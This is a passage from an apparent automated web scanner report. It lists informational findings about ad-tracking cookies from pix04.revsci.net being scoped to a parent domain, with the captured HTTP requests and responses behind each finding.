Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=a8cd58cd77607ac5f39b5bbf5c533d34; rsiPus_0="MLuBM15WBV4EFlcCEVJFHBMURFBURJY9EVhHwEBWUhAaEsGQdh2fCjuxAnVgfF7gi69vaww5dGk="; rsi_us_1000000=pUP1Jk+jPwIQlm3EfKIIeTUeF/JvyQbq8mWZPtA01FS2ee8dNFxF4G+GnAMn9WcrwrlxaFqY0O/f2fJMysjjHKnHR1AyLyrV5YaNDkJ/Sz9iTSLWnrcqaeW9JQdk5xB8c5TT7BS5boeRjEXk88graUNSSoQBET1n8cYfeqxRms6DsyWntJXFg4q6t8nlTBXRhlT3ZnaU2QqHtEwjbkGX2cuE5sFvvxfDc0P1x1/YkINpgXca0zgdRWoC3FkTquy/LDHspJLb+6ye52i0gFZ8jaiDtEDQhwQMsqBgw+jJJuD5Y2BkMUQ3RbgfQY9C5tK/FmqYRFZ52k9CfvQzFcVI5PWBlmX8RPSEQN1nnPjNs01GIqNMz9awgCd4dP+vDcMlLAiX5AAQodEidAYP+DcEiCL0bX2IgR07U3iUVDf66rT8NwEy8uPRt4Q7j86Eak+GQEpZDNk7iHnphbuIOYn854kFrhr9LHPGiRTBN9SDG02GRydnp8QEtYyWpdxNzpAz9+BJpIyWBHWSXJU/lT8YMZc0rZpJ/9pq+rino+75Z7tI/xKhizjb7SgX/Zn1a38AtieO7F8k1YX9JM6IqYnbfNnzinjIJ/gcLiFPu6S+z7Sa5mI3O/WshNmzmWQg0GiPE4fCQCsyTxRgJ0dq2w==; NETSEGS_E05511=379226250c6302c7&E05511&0&4dc53ba8&0&&4d9fb2f3&00f8712b16a2747053422af6cef97d9a; udm_0=MLv39SEJaSpn5l6paFGF4PE3PRxA2jF7YYC1PcJb22pwwouGCTcavWRp5gDOVMIHzRWjEwivKG4y8bEh5C5wLlcCwDPbMqRj2DXkTGhDQ89mbFozYsJjVTEuEe/h536ulQSV9ZLPlq3zvY5wI7GSTD5BVaK5PSi5iO04v1pj7PDeGv3V9gM7ANffp4aB2AM/h4hv+T5HgJbAtgb7HqevDR626jrhmXkk69RBMAXp1DdSPYAPQJHJvn/rzZsMfoFkbubkYHmjVEVLasemhsTEo1Serlxmbl0IVn7AefJE4seiDicdI2wontu9IZLwVXc02bCqrYwtitQsQNji6bUMTo/0rT2RSfwdDGJa7xU+fFcroN7218oqxT9x7L35X5DfVBaDrfv29icbjnSxpOmzgnRCNJmalrXQiknC6CGG5dH7zlYBBxkva9nw22SQmXdD/88SrbpYrpKf+UKKtKwts/IjOB6Eazt2PobI4tp2kA5KVtcoWhxRPIHmFCOBaTtO1X2GbaZEI8S14df58UYAZy0ZN5YWWI+O3XTTnts/cczEz7N38q1uFXosRoM5IgYSR04JtFLNDfl6qTI/rRuBVZdxRsDurKPAe1hfxGdmi43q8kUTMdL/6iojPW8Bpg1leE5rV9I+r1+ddGv5HLF1pTh3a+c58Cju7a0VXEHncV9/jXQM/WWwB3k1nJ2JDj9LnMNfD3topntubRGUl2IHm/cuf4Pmw6IoBenU93ZANgR8RJmAS9jO3pq6W15G8DajMvT2Me5/680mvSKsbn8Ovx2R1L4UTH6Km0BSQD2a0DdQOlZLvCu6QyaEfjRkLzHqiwqSJq4cGLPTom4fK3zWi7uWVgSjuYevdiogpfoKxnEMYxVDqJSS06gQ3rnQQxFCYVdSRj2Y9kY+SYa7XCqnZrKPGeBwqT0TlcOMQ0TSbcFBKbc3OQaYo4/OTIjOJKFQ9uSW7SYRUSMKG538HQcbyYKwIxW6hAYLW9Q1y9MJ/g328nZvUZ7bZMGBwpxqeVab0uTo3M5eA37y1R62xsVIrL3T8Y3jsAk6da8WuMg8qhQM77GcgsxMV8+8QbHPrn7mYnL5YvFO6V+LFGqyfa3btS08ujZPpHweBvJ8FjgxIVDr32Hjid6G; NETSEGS_F08747=379226250c6302c7&F08747&0&4dc53c39&0&&4d9ebfcb&00f8712b16a2747053422af6cef97d9a; NETSEGS_L09857=379226250c6302c7&L09857&0&4dc53c3d&0&&4d9fd0ee&00f8712b16a2747053422af6cef97d9a; NETSEGS_J06575=379226250c6302c7&J06575&0&4dc53c9e&0&&4d9fd931&00f8712b16a2747053422af6cef97d9a; rtc_l71z=MLsv7iMucD5npqgDC0e9A9S30MEszwLosfaz5fWZ65hV2fUeqlt8L6cj/qSrEX5/s8WnsS00IKdsJuIlbI0n6i5mCFMCk/DX0ZUZhQNOqEqv6ZJx9H7x4sWwa0LKdLu6EDs2kZV8061wlsTiDnxDiSHnPc+ZMsR67OfyuVuRW+F5iRkzlcSm/OepgsdXo88JhULWLh4a8A6PyDf903KoAeUpitP4N3NHYKrDRno2A2G7cKcnRxKVxwMcXyZShLrki39i5R2d0TDalpcI3lQLOzWjSjYjgqHDlwIgVLwfpXxffwb2O+079hdYhGZkfhCjDm663gi652dE4tuvo0Wk6TBEetIB0B851bjeN97FHa1+AcoTzJ7vr9miJTCPeFwcdknuxboNaAb30giKRMoAYZA4YbUzrt9+lX/Y4xR8j5Zql80uS1MWG+qf2bN9oL3Kb6AfYwp9dbQvTTz1fmKCvi1xxnAWV3rx4+GReBq6rIo=; rsi_segs_1000000=pUPFJ0OBLwIMVp8ceRNDq8maNxmQEThmUA+HR+nmRzwm8QPcP9x647po7dW5vrupC8lCs6D/OrhgYgORMH2eSavdl6IYzEk0uIESUewwwmOKkXNnorhALJozV7bhzVmEfY7eCxU7MWjQim3y3th8Malcku2Afxf//MrMObaH93rWa7ZhUsfEturVlH6WamUby0tSFEavYsJrsQLSCjPlbSTZdRfrCgJVRf8Dd7Jhv99cIoBp05o1oiKWL8a7+WY7Eb1wNPVr87BCFhol0fBCmZ3x/n4axhNU4j896AhedNlpzBXshSy0fQO6ucWXjw==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_l71z=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFJ0OBbwIMV594t637UACbRNpW80lkUA+HR+nmR+zdL28cRLrw7OdqtvRQX7M6YvuD6G01f/A+EgL9GIcLk0FNznVXs1FOCnfg0VUZcvsQPTvmT/tqUJ5VUxzqzSb3Ao/eR1mU8id0bEE9wVyvXGviU4q2/8L7DKCUk26klWSoHqqXGI+Go0k+jVWKqsXLUpqBJOEA2F/gm+KkRHDXs8D+qwKzVzBzryUjYCqrtRa5EyIw6SRZuNrKIzCR7NTb3NFQ9sURGxHaosyq7i49P+gqmI3N8elFX335OAQ9t6XYqZPI4yH+Q+Ir0aAT; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 12:38:27 GMT; Path=/
Set-Cookie: rtc_X7G4=MLsv8SMucD5nprADC+dAdB3TWgyy2mghBM3EFhQOAZ/gWNQv0Gro+BWjQ4EZLeo310XdXThxtQ6zdDA6J56uUqSv9qW8WduZgAsZhQNOpEq375QA5H5xY8WwU0LKdLuKEDsyFgLs2QD8nLdDzO0REKiqyMaZNMAKnMOnxXWEt8BjuZwKECyW0ZU/wYMuLfzoH/xvc6ywJ1W113TC0bnUQuUBso9vh5RFanDIGZ2QiD0apxJXYQJ3YRuQwyAQiH53Gnljo3T2HFXnMDtm7poq+UoB4RO6FWYEuNgDNyjEaq/g47KKpWhKrWKg6d7RzIqaR34ol/UyR6hDqg+9O85GQG43imOZzWup0YgPP+srSHoErx8roGJPP1d+O+kR6HEaauAX4x6nTM+FXHdYj4fjovLuNWTZDP2DZbds4wvJmpLIJZNXcbptyl9/9gulineUIz0/ATSO02q23EcUpGL65sV23BazOIoRQl98h+CXWg/apXs=; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 12:38:27 GMT; Path=/
X-Proc-ms: 27
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 09 Apr 2011 12:38:26 GMT
Content-Length: 593

/* Vermont 12.4.0-1132 (2011-03-01 13:30:46 UTC) */
rsinetsegs = ['E05511_10410','E05511_10412','E05511_10033','E05511_10004','D08734_70006','D08734_70043','D08734_70072','E05511_10424','D08734_72076'
...[SNIP]...
5.115. http://pix04.revsci.net/E05511/b3/0/3/0902121/71706519.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /E05511/b3/0/3/0902121/71706519.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /E05511/b3/0/3/0902121/71706519.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Flink.asp%253FL%253D398823%2526affname%253DWCAX%2526adtag%253DNews%2526conttype%253DL%2526baseurl%253Dwww.wcax.com%26DM_REF%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fstory.asp%253FS%253D452989%26DM_EOM%3D1&C=E05511 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/link.asp?L=398823
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=a8cd58cd77607ac5f39b5bbf5c533d34; rsiPus_0="MLuBM15WBV4EFlcCEVJFHBMURFBURJY9EVhHwEBWUhAaEsGQdh2fCjuxAnVgfF7gi69vaww5dGk="; rsi_us_1000000=pUP1Jk+jPwIQlm3EfKIIeTUeF/JvyQbq8mWZPtA01FS2ee8dNFxF4G+GnAMn9WcrwrlxaFqY0O/f2fJMysjjHKnHR1AyLyrV5YaNDkJ/Sz9iTSLWnrcqaeW9JQdk5xB8c5TT7BS5boeRjEXk88graUNSSoQBET1n8cYfeqxRms6DsyWntJXFg4q6t8nlTBXRhlT3ZnaU2QqHtEwjbkGX2cuE5sFvvxfDc0P1x1/YkINpgXca0zgdRWoC3FkTquy/LDHspJLb+6ye52i0gFZ8jaiDtEDQhwQMsqBgw+jJJuD5Y2BkMUQ3RbgfQY9C5tK/FmqYRFZ52k9CfvQzFcVI5PWBlmX8RPSEQN1nnPjNs01GIqNMz9awgCd4dP+vDcMlLAiX5AAQodEidAYP+DcEiCL0bX2IgR07U3iUVDf66rT8NwEy8uPRt4Q7j86Eak+GQEpZDNk7iHnphbuIOYn854kFrhr9LHPGiRTBN9SDG02GRydnp8QEtYyWpdxNzpAz9+BJpIyWBHWSXJU/lT8YMZc0rZpJ/9pq+rino+75Z7tI/xKhizjb7SgX/Zn1a38AtieO7F8k1YX9JM6IqYnbfNnzinjIJ/gcLiFPu6S+z7Sa5mI3O/WshNmzmWQg0GiPE4fCQCsyTxRgJ0dq2w==; NETSEGS_E05511=379226250c6302c7&E05511&0&4dc53ba8&0&&4d9fb2f3&00f8712b16a2747053422af6cef97d9a; udm_0=MLv39SEJaSpn5l6paFGF4PE3PRxA2jF7YYC1PcJb22pwwouGCTcavWRp5gDOVMIHzRWjEwivKG4y8bEh5C5wLlcCwDPbMqRj2DXkTGhDQ89mbFozYsJjVTEuEe/h536ulQSV9ZLPlq3zvY5wI7GSTD5BVaK5PSi5iO04v1pj7PDeGv3V9gM7ANffp4aB2AM/h4hv+T5HgJbAtgb7HqevDR626jrhmXkk69RBMAXp1DdSPYAPQJHJvn/rzZsMfoFkbubkYHmjVEVLasemhsTEo1Serlxmbl0IVn7AefJE4seiDicdI2wontu9IZLwVXc02bCqrYwtitQsQNji6bUMTo/0rT2RSfwdDGJa7xU+fFcroN7218oqxT9x7L35X5DfVBaDrfv29icbjnSxpOmzgnRCNJmalrXQiknC6CGG5dH7zlYBBxkva9nw22SQmXdD/88SrbpYrpKf+UKKtKwts/IjOB6Eazt2PobI4tp2kA5KVtcoWhxRPIHmFCOBaTtO1X2GbaZEI8S14df58UYAZy0ZN5YWWI+O3XTTnts/cczEz7N38q1uFXosRoM5IgYSR04JtFLNDfl6qTI/rRuBVZdxRsDurKPAe1hfxGdmi43q8kUTMdL/6iojPW8Bpg1leE5rV9I+r1+ddGv5HLF1pTh3a+c58Cju7a0VXEHncV9/jXQM/WWwB3k1nJ2JDj9LnMNfD3topntubRGUl2IHm/cuf4Pmw6IoBenU93ZANgR8RJmAS9jO3pq6W15G8DajMvT2Me5/680mvSKsbn8Ovx2R1L4UTH6Km0BSQD2a0DdQOlZLvCu6QyaEfjRkLzHqiwqSJq4cGLPTom4fK3zWi7uWVgSjuYevdiogpfoKxnEMYxVDqJSS06gQ3rnQQxFCYVdSRj2Y9kY+SYa7XCqnZrKPGeBwqT0TlcOMQ0TSbcFBKbc3OQaYo4/OTIjOJKFQ9uSW7SYRUSMKG538HQcbyYKwIxW6hAYLW9Q1y9MJ/g328nZvUZ7bZMGBwpxqeVab0uTo3M5eA37y1R62xsVIrL3T8Y3jsAk6da8WuMg8qhQM77GcgsxMV8+8QbHPrn7mYnL5YvFO6V+LFGqyfa3btS08ujZPpHweBvJ8FjgxIVDr32Hjid6G; NETSEGS_F08747=379226250c6302c7&F08747&0&4dc53c39&0&&4d9ebfcb&00f8712b16a2747053422af6cef97d9a; NETSEGS_L09857=379226250c6302c7&L09857&0&4dc53c3d&0&&4d9fd0ee&00f8712b16a2747053422af6cef97d9a; NETSEGS_J06575=379226250c6302c7&J06575&0&4dc53c9e&0&&4d9fd931&00f8712b16a2747053422af6cef97d9a; rtc_tCdk=MLsv8SUucA5nprADwxMUZdS30MEszwLosfaz5fWZ65hV2fUOBnLo+BWjQ4EZLeotOXo28EHvDL1pbNNARLmM/MYdyRgTqxD/lMxcrQFepPrNSkm1eU9Lpin2xzgwRP18/xxpkNoVxqc5g0K0i0fqu3Z4OZ9TCWukp+fzOXqRG+FbCpZ1lNWeSoRp4pvl4W6xqmQFwWU4O5lr/3fAwOzCWOZFcV4p1IbmF2CVroSv3ekRCrxTkn5Gj5BfK6lws/9BSK4R70kIxYgnwBeKw5gxrJ3HWM6FdzLDP5HzR2IBwJkmQi2PJ2/xBDCzSRK2+IWaGVbp6A4vS07+Pp50Hceyamh9kzCVl5fXWYJfEHo3UDxtErrqNDBNGococWXvmK9Mn9/Q6WuUqV6V5eL076M1x6tZ+Kt2nJxiCiipnhEvR401rHK3bALb6xPrlKqYCmmWIf+v0EeQWP5MoKcUvGL45sV23Lj6SqCX5B1KhaG/GlEdpdM=; rsi_segs_1000000=pUPFJ0OBb3IQV+Ubea770FESU6i2AtnKCDeVRxV0pFsimSbWBw8RKQZQqGmcAHhFlCQnpMeUtFmK7mWx+zWRJ7JnGfOpf0Ud/9xHuDtILCncfzqXUSnG/Cy3tsi7pMKrY9q7DERCZ0T3/lunM2xMQBSBJVEUv2Uw97XNucSu771FPtNXv47fO/viciwUhcA8skS3XxAbh9FYRtizsGzWxf2wCDk/qOZEMEWUzkg85B0kOvfpQj49pE2cRV2TdXsWyFivNB3CVfavnL5cSKl9Elq+WkafICs8jjFD8pPstcQPdfqkOa2OLpKV3DjiTtlApA==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_tCdk=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFJ0OBLwIMVp8ceRNDq2qIaG8wTn9J0QSlgYlQhPrU/yUINJwrcQgYrocUZKyvzimW9stkryykBGWx+zsRJJJHGffRX0UbHd1GuLNHKym8P0LbSZEzVuCAX4vuAkY5No9S7WbpjYUkfOfEJDXAgKmsLWwTS/CGoon/DEpNQYbaAFrcxnKamICZluB2Bp82SYiW3ovSEOT9qT4a5l4tOd5O5fXvErcTC+Pkal6xqMP03V7uhGtf/+QSn1zllHsOyVTCkvfhck0q5FMss9raCXJCcgV0B7cfnXm5BKxNyXooQEl3mzrI70AREyLSCQNApQ==; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 13:16:08 GMT; Path=/
Set-Cookie: rtc_Xfh5=MLsv7iUucA5nprADwxMUR9Sz0MEszwLosfaz5fWZ65hV2fUOBnLo+BWjQ4EZLeotOXo28EHvDL1pbOBARLmM/MYd6RgTq9u+iM7/hQBepPr9SkW1eU9LpSn2tzgwRP0c/xx5jIRX7BMLqY4BgQC03lxOEmvvtSk5ET4IMDzv8yWjLYK7pDAruXWuMrqWQYCGy8NcEmqwJlS1r3QCTBMPKlGt8h8jhoskQYAEg5VB6abCKt0ty7d4V0r5LMiHjJ1yDDxjo3fWHFdlT0J3x3vNTBOP3u4LdR/ixLPJ4yHO+zAfzaP4HygF1suDMBuT4oX+Q3ErH7vVwhv5PsadCEykM5nhDDFNysSgXBEG+twoDa14AcpRzAbhEsFenqXNxpvSYpqc3Iy2NCgIfu7mw81csoIeKwTlkp9olnajK1wOkRn/RbFuU1Ma+eqf2bJ54C9QYGm/4BYb5mYPHUYbSUBiWvzEkXm4bqgQDP0t5t9xesus2w==; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 13:16:08 GMT; Path=/
X-Proc-ms: 26
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 09 Apr 2011 13:16:07 GMT
Content-Length: 653

/* Vermont 12.4.0-1132 (2011-03-01 13:30:46 UTC) */
rsinetsegs = ['E05511_10410','E05511_10412','E05511_10033','E05511_10034','E05511_10004','D08734_70006','D08734_70043','D08734_70072','E05511_10424'
...[SNIP]...
5.116. http://pix04.revsci.net/E05511/b3/0/3/0902121/734832866.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /E05511/b3/0/3/0902121/734832866.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /E05511/b3/0/3/0902121/734832866.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fstory.asp%253FS%253D503137%2526affname%253DWCAX%2526adtag%253DPolitical%2526conttype%253DS%2526baseurl%253Dwww.wcax.com%26DM_REF%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18197%26DM_EOM%3D1&C=E05511 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=a8cd58cd77607ac5f39b5bbf5c533d34; rsiPus_0="MLuBM15WBV4EFlcCEVJFHBMURFBURJY9EVhHwEBWUhAaEsGQdh2fCjuxAnVgfF7gi69vaww5dGk="; rsi_us_1000000=pUP1Jk+jPwIQlm3EfKIIeTUeF/JvyQbq8mWZPtA01FS2ee8dNFxF4G+GnAMn9WcrwrlxaFqY0O/f2fJMysjjHKnHR1AyLyrV5YaNDkJ/Sz9iTSLWnrcqaeW9JQdk5xB8c5TT7BS5boeRjEXk88graUNSSoQBET1n8cYfeqxRms6DsyWntJXFg4q6t8nlTBXRhlT3ZnaU2QqHtEwjbkGX2cuE5sFvvxfDc0P1x1/YkINpgXca0zgdRWoC3FkTquy/LDHspJLb+6ye52i0gFZ8jaiDtEDQhwQMsqBgw+jJJuD5Y2BkMUQ3RbgfQY9C5tK/FmqYRFZ52k9CfvQzFcVI5PWBlmX8RPSEQN1nnPjNs01GIqNMz9awgCd4dP+vDcMlLAiX5AAQodEidAYP+DcEiCL0bX2IgR07U3iUVDf66rT8NwEy8uPRt4Q7j86Eak+GQEpZDNk7iHnphbuIOYn854kFrhr9LHPGiRTBN9SDG02GRydnp8QEtYyWpdxNzpAz9+BJpIyWBHWSXJU/lT8YMZc0rZpJ/9pq+rino+75Z7tI/xKhizjb7SgX/Zn1a38AtieO7F8k1YX9JM6IqYnbfNnzinjIJ/gcLiFPu6S+z7Sa5mI3O/WshNmzmWQg0GiPE4fCQCsyTxRgJ0dq2w==; NETSEGS_E05511=379226250c6302c7&E05511&0&4dc53ba8&0&&4d9fb2f3&00f8712b16a2747053422af6cef97d9a; udm_0=MLv39SEJaSpn5l6paFGF4PE3PRxA2jF7YYC1PcJb22pwwouGCTcavWRp5gDOVMIHzRWjEwivKG4y8bEh5C5wLlcCwDPbMqRj2DXkTGhDQ89mbFozYsJjVTEuEe/h536ulQSV9ZLPlq3zvY5wI7GSTD5BVaK5PSi5iO04v1pj7PDeGv3V9gM7ANffp4aB2AM/h4hv+T5HgJbAtgb7HqevDR626jrhmXkk69RBMAXp1DdSPYAPQJHJvn/rzZsMfoFkbubkYHmjVEVLasemhsTEo1Serlxmbl0IVn7AefJE4seiDicdI2wontu9IZLwVXc02bCqrYwtitQsQNji6bUMTo/0rT2RSfwdDGJa7xU+fFcroN7218oqxT9x7L35X5DfVBaDrfv29icbjnSxpOmzgnRCNJmalrXQiknC6CGG5dH7zlYBBxkva9nw22SQmXdD/88SrbpYrpKf+UKKtKwts/IjOB6Eazt2PobI4tp2kA5KVtcoWhxRPIHmFCOBaTtO1X2GbaZEI8S14df58UYAZy0ZN5YWWI+O3XTTnts/cczEz7N38q1uFXosRoM5IgYSR04JtFLNDfl6qTI/rRuBVZdxRsDurKPAe1hfxGdmi43q8kUTMdL/6iojPW8Bpg1leE5rV9I+r1+ddGv5HLF1pTh3a+c58Cju7a0VXEHncV9/jXQM/WWwB3k1nJ2JDj9LnMNfD3topntubRGUl2IHm/cuf4Pmw6IoBenU93ZANgR8RJmAS9jO3pq6W15G8DajMvT2Me5/680mvSKsbn8Ovx2R1L4UTH6Km0BSQD2a0DdQOlZLvCu6QyaEfjRkLzHqiwqSJq4cGLPTom4fK3zWi7uWVgSjuYevdiogpfoKxnEMYxVDqJSS06gQ3rnQQxFCYVdSRj2Y9kY+SYa7XCqnZrKPGeBwqT0TlcOMQ0TSbcFBKbc3OQaYo4/OTIjOJKFQ9uSW7SYRUSMKG538HQcbyYKwIxW6hAYLW9Q1y9MJ/g328nZvUZ7bZMGBwpxqeVab0uTo3M5eA37y1R62xsVIrL3T8Y3jsAk6da8WuMg8qhQM77GcgsxMV8+8QbHPrn7mYnL5YvFO6V+LFGqyfa3btS08ujZPpHweBvJ8FjgxIVDr32Hjid6G; NETSEGS_F08747=379226250c6302c7&F08747&0&4dc53c39&0&&4d9ebfcb&00f8712b16a2747053422af6cef97d9a; NETSEGS_L09857=379226250c6302c7&L09857&0&4dc53c3d&0&&4d9fd0ee&00f8712b16a2747053422af6cef97d9a; rtc_qSZK=MLsv7lMucG5r51i93r4IM9TGU8HE2WihBMXGQkSn286NMFwCGETcqMzfbXziKmcrz0rlT3NXbQ2UQPY347g27oCUANSCq8NZjBisn3QA7dNcEnrj5CvIhcVabHvel3/DSTbq/1y+LSORX9Qb6uZ+/xxsqgjGObwCJtl4lmIRkmOq6dknFXic9AzqI7pWtaOhz0lDDVBT+EfLWQtWQim8GH5HVWELDEpJEbLUw6Jg04VvNANMm8nCbZHaeGWCCfCOJbWK/sAxQ5NGzpD8J6ji9kCmwOAU7AzRXpk9EHHa8hTwgWqMFwsDaB5Azfvk7Xq22OLEfgzLVUKiq8n5G0ivSFg4h3SF/AKFKQO20nm04/QvLfz3c+h6IQcDKx9dpliz4vdsDT1sbxJktw7XGFSOZbQ2gK+V9dLFQSs0EnPRWX/E30E=; NETSEGS_J06575=379226250c6302c7&J06575&0&4dc53c40&0&&4d9e8915&00f8712b16a2747053422af6cef97d9a; rsi_segs_1000000=pUPFJ0OFbwIQlbXb0Pblm12emYklQRqSVITAEXBTSyBcnze5Uw5B1RSYogQK6Dav3im0wTfmKqCjPGGhsDO1q5LAweT3++BeZkFWdiVpk+jMNPVmQHpYx8c6H9UiYQ/GoRZHFPBcRukre2FiAIcNjrZbo6RAaXThxD51DLLEndcJCnrZmoHIPwKa4fjr70PXsq0fw/QzyTPMODzqnrRtWnaRpmMzIsk5WvO/XWTwJRgqzvZtu3OBx9c/ojJB91+s52MmUGL/KCcP49D8EkNQcvhsJ6ZEKJBV

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_qSZK=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFJ0OBbwIMV594t637ir85zA1Wc7IaEiIBFXxvHO1ZKic5ngYCBQF0q7tfEV6W8KaQp8dAvSusER0hEoZjgIoA2FbRoQEvNoVutDtItom6EzbfSVHF/SxGtsi7JLpXBbxV4+nFIdqzXHgEf9oWZ5RJC3ujSffAwU6kkmlxpZkNgKVDxHs2h6ZgtVUmsdob5hq0Nqcqao5UL6XWdwSFR8rKSfMbsG8gfniLsdQ15P92pOZ8689xVwM9TdXl8xvh5pZ53Bf4B9rMpsnF5XtDliFMjvJm7UtpVRSWYz5Z; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 12:35:42 GMT; Path=/
Set-Cookie: rtc_ucQg=MLsvrlMusR9jJhHokT9c+IVabtHZzAlfbNtEAmBKZKi5zmNwJhnNeeI4S3b9+hGezmW6Ln0geKBlbrcD9OYDgK5xvRPSmd7E1skkGXtt39bVkBro3/pDJa7WtDpg0n9cK4HLy4PHUYL1qMfvwh6zBTmD3Tq9NcAIrEtRlTLPCVbK4plliAKP6Y1urMVfrK62r1eudYR8l3obNBin+Or1YJCSDLQfDawKE9I3kayv/2L6/OC7EWPIBhcON6NJ0bIQqRR3v9/Y746x7pnadu2KsTdZy9q2LOFaWoIJtemMbkH1yuBwAb2guPh/3EOUW7OJX/dQmLFuaLrE4L2+pzoJlemdndndT5pL3c6dEK1xmqH5NqHj7jqZ3mTtgdw9hH6MmWCujWIOFzZ+sL6cffx50HMJYddjfuKz2MX0KrTWut04fMIbTsVx2/63U4IAYZhnA8KXaw==; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 12:35:42 GMT; Path=/
Set-Cookie: NETSEGS_J06575=379226250c6302c7&J06575&0&4dc53c9e&0&&4d9fd931&00f8712b16a2747053422af6cef97d9a; Domain=.revsci.net; Expires=Sat, 07-May-2011 12:35:42 GMT; Path=/
X-Proc-ms: 26
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 09 Apr 2011 12:35:41 GMT
Content-Length: 473

/* Vermont 12.4.0-1132 (2011-03-01 13:30:46 UTC) */
rsinetsegs = ['E05511_10410','E05511_10412','E05511_10033','E05511_10004','D08734_70006','E05511_10424','D08734_72076','D08734_72077','D08734_72082'
...[SNIP]...
5.117. http://pix04.revsci.net/E05511/b3/0/3/0902121/73563402.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /E05511/b3/0/3/0902121/73563402.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /E05511/b3/0/3/0902121/73563402.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18836%2526affname%253DWCAX%2526adtag%253DCommunity%2526conttype%253DC%2526baseurl%253Dwww.wcax.com%26DM_REF%3Dhttp%253A%252F%252Fwww.wcax.com%252F%26DM_EOM%3D1&C=E05511 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18836
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
